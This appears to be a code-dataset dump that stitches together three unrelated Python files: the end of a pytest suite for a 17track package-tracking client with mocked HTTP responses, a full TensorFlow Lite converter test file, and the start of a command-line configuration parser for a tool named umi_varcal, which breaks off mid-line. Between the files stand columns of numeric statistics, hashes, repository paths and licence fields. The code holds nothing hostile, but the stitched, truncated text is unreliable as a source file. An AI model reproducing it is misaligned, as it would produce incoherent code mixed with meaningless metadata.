assert packages[0].timestamp.isoformat() == "2018-04-23T05:02:00+00:00"
assert packages[1].timestamp.isoformat() == "2019-02-25T18:05:34+00:00"
assert packages[2].timestamp.isoformat() == "1970-01-01T00:00:00+00:00"
@pytest.mark.asyncio
async def test_summary(aresponses):
"""Test getting package summary."""
aresponses.add(
"user.17track.net",
"/userapi/call",
"post",
aresponses.Response(
text=load_fixture("authentication_success_response.json"), status=200
),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(text=load_fixture("summary_response.json"), status=200),
)
async with aiohttp.ClientSession() as session:
client = Client(session=session)
await client.profile.login(TEST_EMAIL, TEST_PASSWORD)
summary = await client.profile.summary()
assert summary["Delivered"] == 0
assert summary["Expired"] == 0
assert summary["In Transit"] == 6
assert summary["Not Found"] == 2
assert summary["Ready to be Picked Up"] == 0
assert summary["Returned"] == 0
assert summary["Undelivered"] == 0
@pytest.mark.asyncio
async def test_add_new_package(aresponses):
"""Test adding a new package."""
aresponses.add(
"user.17track.net",
"/userapi/call",
"post",
aresponses.Response(
text=load_fixture("authentication_success_response.json"), status=200
),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(text=load_fixture("add_package_response.json"), status=200),
)
async with aiohttp.ClientSession() as session:
client = Client(session=session)
await client.profile.login(TEST_EMAIL, TEST_PASSWORD)
await client.profile.add_package("LP00432912409987")
@pytest.mark.asyncio
async def test_add_new_package_with_friendly_name(aresponses):
"""Test adding a new package with friendly name."""
aresponses.add(
"user.17track.net",
"/userapi/call",
"post",
aresponses.Response(
text=load_fixture("authentication_success_response.json"), status=200
),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(text=load_fixture("add_package_response.json"), status=200),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(text=load_fixture("packages_response.json"), status=200),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(
text=load_fixture("set_friendly_name_response.json"), status=200
),
)
async with aiohttp.ClientSession() as session:
client = Client(session=session)
await client.profile.login(TEST_EMAIL, TEST_PASSWORD)
await client.profile.add_package("1234567890987654321", "Friendly name")
@pytest.mark.asyncio
async def test_add_new_package_with_friendly_name_not_found(aresponses):
"""Test adding a new package with friendly name but package not found after adding it."""
aresponses.add(
"user.17track.net",
"/userapi/call",
"post",
aresponses.Response(
text=load_fixture("authentication_success_response.json"), status=200
),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(text=load_fixture("add_package_response.json"), status=200),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(text=load_fixture("packages_response.json"), status=200),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(
text=load_fixture("set_friendly_name_response.json"), status=200
),
)
async with aiohttp.ClientSession() as session:
with pytest.raises(InvalidTrackingNumberError):
client = Client(session=session)
await client.profile.login(TEST_EMAIL, TEST_PASSWORD)
await client.profile.add_package("1234567890987654321567", "Friendly name")
@pytest.mark.asyncio
async def test_add_new_package_with_friendly_name_error_response(aresponses):
"""Test adding a new package with friendly name but setting the name fails."""
aresponses.add(
"user.17track.net",
"/userapi/call",
"post",
aresponses.Response(
text=load_fixture("authentication_success_response.json"), status=200
),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(text=load_fixture("add_package_response.json"), status=200),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(text=load_fixture("packages_response.json"), status=200),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(
text=load_fixture("set_friendly_name_failure_response.json"), status=200
),
)
async with aiohttp.ClientSession() as session:
with pytest.raises(RequestError):
client = Client(session=session)
await client.profile.login(TEST_EMAIL, TEST_PASSWORD)
await client.profile.add_package("1234567890987654321", "Friendly name")
@pytest.mark.asyncio
async def test_add_existing_package(aresponses):
"""Test adding an existing new package."""
aresponses.add(
"user.17track.net",
"/userapi/call",
"post",
aresponses.Response(
text=load_fixture("authentication_success_response.json"), status=200
),
)
aresponses.add(
"buyer.17track.net",
"/orderapi/call",
"post",
aresponses.Response(
text=load_fixture("add_package_existing_response.json"), status=200
),
)
async with aiohttp.ClientSession() as session:
with pytest.raises(RequestError):
client = Client(session=session)
await client.profile.login(TEST_EMAIL, TEST_PASSWORD)
await client.profile.add_package("1234567890987654321")
| 32.086207
| 93
| 0.63962
| 1,207
| 11,166
| 5.783761
| 0.111019
| 0.04412
| 0.069618
| 0.100559
| 0.852743
| 0.852743
| 0.837989
| 0.820656
| 0.820656
| 0.807907
| 0
| 0.042478
| 0.240999
| 11,166
| 347
| 94
| 32.178674
| 0.781239
| 0.003135
| 0
| 0.752542
| 0
| 0
| 0.203587
| 0.094638
| 0
| 0
| 0
| 0
| 0.077966
| 1
| 0
| false
| 0.044068
| 0.023729
| 0
| 0.023729
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
53d18782933e9df7d7c45f5bbe9a1d7c78295471
| 23,039
|
py
|
Python
|
tensorflow/contrib/lite/python/lite_test.py
|
Jibanprakash/tensorflow
|
a8ae26ae1aa7a33b48cca8bf12c42ab7503a45cf
|
[
"Apache-2.0"
] | 54
|
2018-05-29T19:52:44.000Z
|
2021-11-30T10:41:12.000Z
|
tensorflow/contrib/lite/python/lite_test.py
|
Jibanprakash/tensorflow
|
a8ae26ae1aa7a33b48cca8bf12c42ab7503a45cf
|
[
"Apache-2.0"
] | 20
|
2017-12-06T18:20:54.000Z
|
2021-11-10T09:54:23.000Z
|
tensorflow/contrib/lite/python/lite_test.py
|
Jibanprakash/tensorflow
|
a8ae26ae1aa7a33b48cca8bf12c42ab7503a45cf
|
[
"Apache-2.0"
] | 31
|
2018-09-11T02:17:17.000Z
|
2021-12-15T10:33:35.000Z
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for lite.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
from tensorflow.contrib.lite.python import lite
from tensorflow.contrib.lite.python import lite_constants
from tensorflow.contrib.lite.python.interpreter import Interpreter
from tensorflow.python.client import session
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
from tensorflow.python.saved_model import saved_model
from tensorflow.python.training.training_util import write_graph
class FromSessionTest(test_util.TensorFlowTestCase):
def testFloat(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testQuantization(self):
in_tensor_1 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputA')
in_tensor_2 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputB')
out_tensor = array_ops.fake_quant_with_min_max_args(
in_tensor_1 + in_tensor_2, min=0., max=1., name='output')
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(
sess, [in_tensor_1, in_tensor_2], [out_tensor])
converter.inference_type = lite_constants.QUANTIZED_UINT8
converter.quantized_input_stats = {
'inputA': (0., 1.),
'inputB': (0., 1.)
} # mean, std_dev
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(2, len(input_details))
self.assertEqual('inputA', input_details[0]['name'])
self.assertEqual(np.uint8, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((1., 0.),
input_details[0]['quantization']) # scale, zero_point
self.assertEqual('inputB', input_details[1]['name'])
self.assertEqual(np.uint8, input_details[1]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all())
self.assertEqual((1., 0.),
input_details[1]['quantization']) # scale, zero_point
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('output', output_details[0]['name'])
self.assertEqual(np.uint8, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertTrue(output_details[0]['quantization'][0] > 0) # scale
def testQuantizationInvalid(self):
in_tensor_1 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputA')
in_tensor_2 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputB')
out_tensor = array_ops.fake_quant_with_min_max_args(
in_tensor_1 + in_tensor_2, min=0., max=1., name='output')
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(
sess, [in_tensor_1, in_tensor_2], [out_tensor])
converter.inference_type = lite_constants.QUANTIZED_UINT8
converter.quantized_input_stats = {'inputA': (0., 1.)} # mean, std_dev
with self.assertRaises(ValueError) as error:
converter.convert()
self.assertEqual(
'Quantization input stats are not available for input tensors '
'\'inputB\'.', str(error.exception))
def testBatchSizeInvalid(self):
in_tensor = array_ops.placeholder(
shape=[None, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Test invalid shape. None after 1st dimension.
in_tensor = array_ops.placeholder(
shape=[1, None, 16, 3], dtype=dtypes.float32)
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
with self.assertRaises(ValueError) as error:
converter.convert()
self.assertEqual(
'None is only supported in the 1st dimension. Tensor '
'\'Placeholder_1:0\' has invalid shape \'[1, None, 16, 3]\'.',
str(error.exception))
def testBatchSizeValid(self):
in_tensor = array_ops.placeholder(
shape=[None, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testFreezeGraph(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
var = variable_scope.get_variable(
'weights', shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + var
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testGraphviz(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
converter.output_format = lite_constants.GRAPHVIZ_DOT
graphviz_output = converter.convert()
self.assertTrue(graphviz_output)
def testInferenceInputType(self):
in_tensor = array_ops.placeholder(shape=[1, 16, 16, 3], dtype=dtypes.uint8)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
converter.inference_input_type = lite_constants.QUANTIZED_UINT8
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.uint8, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.uint8, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
def testDefaultRangesStats(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
converter.inference_type = lite_constants.QUANTIZED_UINT8
converter.quantized_input_stats = {'Placeholder': (0., 1.)} # mean, std_dev
converter.default_ranges_stats = (0, 6) # min, max
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.uint8, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((1., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.uint8, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertTrue(output_details[0]['quantization'][0] > 0) # scale
class FromFlatbufferFile(test_util.TensorFlowTestCase):
def testFloat(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
_ = in_tensor + in_tensor
sess = session.Session()
# Write graph to file.
graph_def_file = os.path.join(self.get_temp_dir(), 'model.pb')
write_graph(sess.graph_def, '', graph_def_file, False)
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_frozen_graph(graph_def_file,
['Placeholder'], ['add'])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testFloatWithShapesArray(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
_ = in_tensor + in_tensor
sess = session.Session()
# Write graph to file.
graph_def_file = os.path.join(self.get_temp_dir(), 'model.pb')
write_graph(sess.graph_def, '', graph_def_file, False)
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_frozen_graph(
graph_def_file, ['Placeholder'], ['add'],
input_shapes={'Placeholder': [1, 16, 16, 3]})
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
def testFreezeGraph(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
var = variable_scope.get_variable(
'weights', shape=[1, 16, 16, 3], dtype=dtypes.float32)
_ = in_tensor + var
sess = session.Session()
# Write graph to file.
graph_def_file = os.path.join(self.get_temp_dir(), 'model.pb')
write_graph(sess.graph_def, '', graph_def_file, False)
# Ensure the graph with variables cannot be converted.
with self.assertRaises(ValueError) as error:
lite.TocoConverter.from_frozen_graph(graph_def_file, ['Placeholder'],
['add'])
self.assertEqual('Please freeze the graph using freeze_graph.py',
str(error.exception))
def testPbtxt(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
_ = in_tensor + in_tensor
sess = session.Session()
# Write graph to file.
graph_def_file = os.path.join(self.get_temp_dir(), 'model.pbtxt')
write_graph(sess.graph_def, '', graph_def_file, True)
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_frozen_graph(graph_def_file,
['Placeholder'], ['add'])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testInvalidFile(self):
graph_def_file = os.path.join(self.get_temp_dir(), 'invalid_file')
with gfile.Open(graph_def_file, 'wb') as temp_file:
temp_file.write('bad data')
temp_file.flush()
# Attempts to convert the invalid model.
with self.assertRaises(ValueError) as error:
lite.TocoConverter.from_frozen_graph(graph_def_file, ['Placeholder'],
['add'])
self.assertEqual(
'Unable to parse input file \'{}\'.'.format(graph_def_file),
str(error.exception))
class FromSavedModelTest(test_util.TensorFlowTestCase):
def _createSavedModel(self, shape):
"""Create a simple SavedModel."""
saved_model_dir = os.path.join(self.get_temp_dir(), 'simple_savedmodel')
with session.Session() as sess:
in_tensor_1 = array_ops.placeholder(
shape=shape, dtype=dtypes.float32, name='inputB')
in_tensor_2 = array_ops.placeholder(
shape=shape, dtype=dtypes.float32, name='inputA')
out_tensor = in_tensor_1 + in_tensor_2
inputs = {'x': in_tensor_1, 'y': in_tensor_2}
outputs = {'z': out_tensor}
saved_model.simple_save(sess, saved_model_dir, inputs, outputs)
return saved_model_dir
def testSimpleModel(self):
"""Test a SavedModel."""
saved_model_dir = self._createSavedModel(shape=[1, 16, 16, 3])
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_saved_model(saved_model_dir)
tflite_model = converter.convert()
self.assertTrue(tflite_model)
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(2, len(input_details))
self.assertEqual('inputA', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
self.assertEqual('inputB', input_details[1]['name'])
self.assertEqual(np.float32, input_details[1]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all())
self.assertEqual((0., 0.), input_details[1]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testNoneBatchSize(self):
"""Test a SavedModel, with None in input tensor's shape."""
saved_model_dir = self._createSavedModel(shape=[None, 16, 16, 3])
converter = lite.TocoConverter.from_saved_model(saved_model_dir)
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(2, len(input_details))
self.assertEqual('inputA', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
self.assertEqual('inputB', input_details[1]['name'])
self.assertEqual(np.float32, input_details[1]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all())
self.assertEqual((0., 0.), input_details[1]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testOrderInputArrays(self):
"""Test a SavedModel ordering of input arrays."""
saved_model_dir = self._createSavedModel(shape=[1, 16, 16, 3])
converter = lite.TocoConverter.from_saved_model(
saved_model_dir, input_arrays=['inputB', 'inputA'])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(2, len(input_details))
self.assertEqual('inputA', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
self.assertEqual('inputB', input_details[1]['name'])
self.assertEqual(np.float32, input_details[1]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all())
self.assertEqual((0., 0.), input_details[1]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testSubsetInputArrays(self):
"""Test a SavedModel with a subset of the input array names of the model."""
saved_model_dir = self._createSavedModel(shape=[1, 16, 16, 3])
# Check case where input shape is given.
converter = lite.TocoConverter.from_saved_model(
saved_model_dir,
input_arrays=['inputA'],
input_shapes={'inputA': [1, 16, 16, 3]})
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check case where input shape is None.
converter = lite.TocoConverter.from_saved_model(
saved_model_dir, input_arrays=['inputA'], input_shapes={'inputA': None})
tflite_model = converter.convert()
self.assertTrue(tflite_model)
if __name__ == '__main__':
test.main()
| 42.11883
| 80
| 0.691957
| 2,942
| 23,039
| 5.220598
| 0.081577
| 0.100592
| 0.016277
| 0.018361
| 0.853767
| 0.827398
| 0.820301
| 0.809753
| 0.803242
| 0.796601
| 0
| 0.032072
| 0.164981
| 23,039
| 546
| 81
| 42.195971
| 0.766296
| 0.095794
| 0
| 0.7825
| 0
| 0
| 0.064874
| 0
| 0
| 0
| 0
| 0
| 0.3775
| 1
| 0.0475
| false
| 0
| 0.0425
| 0
| 0.1
| 0.0025
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
53ef51bb37bbad7657cf5c52a68633e87b105581
| 14,952
|
py
|
Python
|
functions/Config.py
|
charlie068/umi_varcal
|
d1c6854cc0dec5d94387cfcb72b3f389eb2eed3f
|
[
"MIT"
] | null | null | null |
functions/Config.py
|
charlie068/umi_varcal
|
d1c6854cc0dec5d94387cfcb72b3f389eb2eed3f
|
[
"MIT"
] | null | null | null |
functions/Config.py
|
charlie068/umi_varcal
|
d1c6854cc0dec5d94387cfcb72b3f389eb2eed3f
|
[
"MIT"
] | null | null | null |
# THIS FUNCTION ALLOWS TO CONFIGURE THE PARAMETERS FROM THE COMMAND LINE
# AND PROPERLY PASS THEM TO THE CORRESPONDING FUNCTION CALLS
#
# INPUT :
# NONE
#
# VALUE : -CONFIG : (DICT) A DICTIONNARY THAT CONTAINS ALL NECESSARY THE PARAMETERS AND THEIR VALUES
#
import os
import sys
import time
### import functions from the script in the same dir
from func import *
from PrintHelp import *
def Config():
config={}
if len(sys.argv) == 1 or "--help" in sys.argv or "-h" in sys.argv:
if "extract" in sys.argv:
PrintHelp("extract")
elif "call" in sys.argv:
PrintHelp("call")
else:
PrintHelp("general")
# configure the extraction tool
elif sys.argv[1] == "extract":
if len(sys.argv) == 2:
PrintHelp("extract")
### just in case script path contains '-' or '--'
sys.argv[0] = "None"
sys.argv.remove('extract')
# default parameters
config["bwa_threads"] = 1
### required parameters
# input : path to the bam/sam file
# fasta : path to the fasta file
# umi length : length of the umi
required = ['--input | -i', '--fasta | -f', '--umi_length | -l']
for param in required:
missing = False
for arg in param.split(" | "):
try:
test = sys.argv.index(arg)
missing = False
break
except:
missing = True
if missing:
PrintTime('error', "\tThe parameter "+param+" is required but missing !\n\t\t\tExiting...")
exit()
print("\n")
PrintTime("console", "\tConfiguring Parameters...")
# differentiate the '-' in fasta of the '-' for arguments
try:
fastaIdx = sys.argv.index("--fasta")
fastaIdx+=1
sys.argv[fastaIdx] = sys.argv[fastaIdx].replace("-", ":")
except:
try:
fastaIdx = sys.argv.index("-f")
fastaIdx+=1
sys.argv[fastaIdx] = sys.argv[fastaIdx].replace("-", ":")
except:
pass
# differentiate the '-' in input of the '-' for arguments
try:
inputIdx = sys.argv.index("--input")
inputIdx+=1
sys.argv[inputIdx] = sys.argv[inputIdx].replace("-", ":")
except:
try:
inputIdx = sys.argv.index("-i")
inputIdx+=1
sys.argv[inputIdx] = sys.argv[inputIdx].replace("-", ":")
except:
pass
### verify that no arguments are empty
params_in_config = ['input', 'fasta', 'umi_length']
params_mini = ['i', 'f', 'l']
params = ['--input | -i', '--fasta | -f', '--umi_length | -l']
pointer = 1
while pointer < len(sys.argv):
param = sys.argv[pointer]
try:
value = sys.argv[pointer+1]
except:
if "--" in param:
if param in ['--input', '--fasta', '--umi_length']:
PrintTime('error', "\tThe parameter "+params[params_in_config.index(param.replace("--", ""))]+" is required and cannot be empty !\n\t\t\tExiting...")
exit()
else:
if param.replace("--", "") in params_in_config:
PrintTime('error', "\tThe parameter's "+params[params_in_config.index(param.replace("--", ""))]+" value cannot be empty !\n\t\t\tExiting...")
exit()
else:
PrintTime('error', "\tThe parameter "+param+" is unknown !\n\t\t\tExiting...")
exit()
elif "-" in param and "--" not in param:
if param in ['-i', '-f', '-l']:
PrintTime('error', "\tThe parameter "+params[params_mini.index(param.replace("-", ""))]+" is required and cannot be empty !\n\t\t\tExiting...")
exit()
else:
if param.replace("-", "") in params_mini:
PrintTime('error', "\tThe parameter's "+params[params_mini.index(param.replace("-", ""))]+" value cannot be empty !\n\t\t\tExiting...")
exit()
else:
PrintTime('error', "\tThe parameter "+param+" is unknown !\n\t\t\tExiting...")
exit()
else:
PrintTime('error', "\tThe parameter "+param+" is unknown !\n\t\t\tExiting...")
exit()
if "-" in value and len(value) == 2:
PrintTime('error', "\tThe parameter "+param+" is required and cannot be empty !\n\t\t\tExiting...")
exit()
if "--" in value and len(value) > 3:
PrintTime('error', "\tThe parameter "+param+" is required and cannot be empty !\n\t\t\tExiting...")
exit()
pointer += 2
args=""
for arg in sys.argv:
args+=" "+arg
args = args.replace("--", "|")
args = args.replace("-", "|")
args = args.split("|")
del args[0]
for arg in args:
param = arg.split(" ")[0]
value = arg.split(" ")[1]
if param == "input" or param == "i":
param = "input"
if value[0] != "/":
value = os.getcwd()+"/"+value.replace(":", "-")
config[param]=value.replace(":", "-")
if param == "fasta" or param == "f":
param = "fasta"
if value[0] != "/":
